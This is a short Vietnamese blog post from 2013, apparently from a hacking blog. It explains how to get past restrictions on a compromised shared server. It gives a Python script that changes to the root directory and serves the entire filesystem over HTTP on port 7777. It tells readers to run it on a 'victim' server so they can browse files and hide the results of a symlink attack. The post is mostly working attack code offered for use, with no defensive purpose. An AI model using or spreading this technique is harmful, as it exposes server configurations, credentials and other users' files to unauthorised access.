Thứ Ba, 4 tháng 6, 2013

Sym root bypass open port nếu server cho chạy python

Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.
Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py
#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()

Sau đó chạy nó python capuchino.py

rồi kiểm tra kết quả :victim:7777

Cách này có thể giấu đc kết quả thực hiện sym trên server

Không có nhận xét nào:

Đăng nhận xét